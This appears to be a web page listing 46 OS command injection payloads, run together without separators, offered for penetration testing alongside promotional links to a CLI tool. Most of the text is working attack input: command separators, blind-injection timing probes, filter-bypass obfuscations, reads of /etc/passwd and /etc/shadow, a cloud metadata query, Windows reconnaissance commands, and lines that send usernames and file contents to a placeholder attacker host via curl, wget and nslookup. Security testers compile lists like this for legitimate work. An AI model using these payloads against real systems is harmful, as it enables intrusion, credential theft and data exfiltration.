$loading...
OS command injection payloads for testing command separators, blind injection, and filter bypasses. (46 payloads)
; id| id|| id& id&& id$(id)`id`%0aid\nid; sleep 5& timeout /T 5; ping -c 5 LHOST& ping -n 5 LHOST; curl http://LHOST/$(whoami); wget http://LHOST/$(id|base64); nslookup $(whoami).LHOST& nslookup %USERNAME%.LHOST| curl http://LHOST -d @/etc/passwdc'a't /etc/passwdc\at /etc/passwdca$@t /etc/passwd/bin/c?t /etc/passwd/???/??t /???/??????cat${IFS}/etc/passwdcat$IFS/etc/passwd{cat,/etc/passwd}X=$'cat\x20/etc/passwd'&&$Xecho${IFS}$(cat${IFS}/etc/passwd)w\h\o\a\m\i$(printf '\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'); cat /etc/passwd; cat /etc/shadow; ls -la /; uname -a; env; find / -perm -4000 2>/dev/null; curl http://169.254.169.254/latest/meta-data/& whoami& ipconfig& type C:\Windows\System32\drivers\etc\hosts& net user& net localgroup administrators& systeminfo& tasklist& dir C:\Users& powershell -c "Get-Process"Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides